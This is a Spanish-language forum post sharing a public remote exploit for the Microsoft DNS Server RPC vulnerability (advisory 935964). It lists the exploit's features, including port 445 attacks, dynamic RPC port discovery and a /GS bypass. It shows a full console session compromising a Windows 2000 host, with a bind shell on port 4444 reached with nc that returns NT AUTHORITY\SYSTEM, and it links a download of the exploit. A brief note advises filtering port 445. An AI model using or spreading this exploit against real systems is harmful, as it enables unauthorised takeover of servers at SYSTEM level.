El amigo
Andrés Tarascó ha publicado junto con
Mario Ballano un nuevo exploit para la vulnerabilidad remota del servicio de DNS de Microsoft que permitiría a un usuario la ejecución remota de código con privilegios de SYSTEM.
El advisory lo podeis leer aquí:
http://www.microsoft.com/technet/security/advisory/935964.mspxAl contrario que los reportes iniciales de Microsoft, han notificado de que su exploit es capaz de atacar un sistema a través del puerto 445 por lo que dicho puerto debe ser filtrado en el firewall hasta que el parche definitivo sea publicado.
Han actualizado la primera versión de la prueba de concepto con muchas novedades (tanto para Windows 2000 como 2003). Entre las nuevas funcionalidades tenemos:
- Ataque por defecto al puerto 445 (requiere autenticación)
- Permite seleccionar puertos tcp dinamicos (sin autenticación)
- Identificación automática de puertos rpc dinámicos del dns
- Identificación local y remota de sistema operativo para ajuste de offsets
- Windows 2000 server y Windows 2003 server (Spanish) soportados por defecto
- Solucionados bugs en la shellcode de windows 2003
- Exploit universal en local para windows 2000 (búsqueda automática de opcodes)
- Exploit universal en local y remoto para Windows 2003 (unicode.nls) saltando la protección /GS (pero no DEP)
- Agregado soporte para windows 2000 en ingles e italiano (no verificado)
- Uso de la api de RPC de Microsoft :-)
A continuación se muestra un ejemplo del uso del exploit contra un sistema windows 2000 server:
Ejemplo del uso del exploit:
D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.7
--------------------------------------------------------------
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
--------------------------------------------------------------
- Trying to fingerprint target.. (05.00)
- Remote Host identified as Windows 2000
[-] No port selected. Trying Ninja sk1llz
- Binding to ncacn_ip_tcp:192.168.1.7
- Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
- RPC binding string: ncacn_ip_tcp:192.168.1.7[1028]
- Dynamic DNS rpc port found (1028)
- Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.7[1028]
- RpcBindingFromStringBinding success
- Selected target 0x79467ef8
- Sending Exploit code to DnssrvOperation()
- Now try to connect to port 4444
D:\>nc 192.168.1.7 4444
Microsoft Windows 2000 [Versión 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM
del exploit y el análisis del mismo:
http://www.514.es/Microsoft_Dns_Server_Exploit_v2.1.zipFuente: http://www.514.es/2007/04/exploit_remoto_para_el_servici.html
Autor
En línea
:D:D:D , gran aporte como siempre lo han hecho...mmm... el executable ya compilado , me da errror es solo a mi o hay mas personas???
